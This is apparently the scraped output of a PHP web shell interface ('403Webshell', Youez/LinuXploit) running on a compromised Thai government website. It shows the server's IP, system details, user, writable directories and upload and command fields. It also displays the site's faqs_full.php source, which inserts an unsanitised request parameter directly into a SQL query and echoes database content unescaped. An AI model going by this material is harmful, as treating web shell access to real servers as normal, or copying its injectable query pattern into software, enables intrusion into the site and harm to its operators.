403Webshell
Server IP : 119.59.102.212  /  Your IP : 3.141.244.88
Web Server : Apache/2
System : Linux narin 2.6.32-042stab142.1 #1 SMP Tue Jan 28 23:44:17 MSK 2020 x86_64
User : yangkam ( 1022)
PHP Version : 5.6.40
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/yangkam/domains/yangkam.go.th/public_html/coremain/module/faqs/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/yangkam/domains/yangkam.go.th/public_html/coremain/module/faqs/faqs_full.php
<?php
// Status Package Module
$status_module=select_query("status_module","cms_status_module","id","29");
if($status_module[0]!=1)	{	
	fieldset_no_module();
}

$navig['faqs']="ถาม-ตอบ";
$navig['faqs_full']="รายละเอียด";

navigator($navig);
echo "<br>";
bar_header("รายละเอียด"); // Bar_Header
fieldset_top("ถาม-ตอบ");

import_request_variables('pG', 'p_');
if($p_ids!="")							{  $ids=trim($p_ids);											}
?>

<table width='100%' border='0' cellspacing='1' align='center' cellpadding='0'>
  <tr> 
    <td  height="100" valign="top" align='center'>
    <?php
      $sqlnews = "select * from cms_faqs where id=$ids";
      $resultnews = mysql_query($sqlnews);
      while ($datanews = mysql_fetch_array($resultnews)) {
    ?>
        <table width='98%' border='0' cellpadding='0' cellspacing='0'>
          <tr height='40' valign="top">
            <td width='15%'><img src='coremain/images/arr3.jpg'>&nbsp;&nbsp;<b>คำถาม :</td>
            <td width='90%'><?php echo $datanews['question'] ?></td>
          </tr>
          <tr valign="top">
            <td width='15%'><img src='coremain/images/arr3.jpg'>&nbsp;&nbsp;<b>คำตอบ :</b></td>
            <td align='left'><?php echo $datanews['ans'] ?></td>
          </tr>
        </table>
    <?php } ?>
    </td>
  </tr>
</table>

<?php
  fieldset_down();
?>

Youez - 2016 - github.com/yon3zu
LinuXploit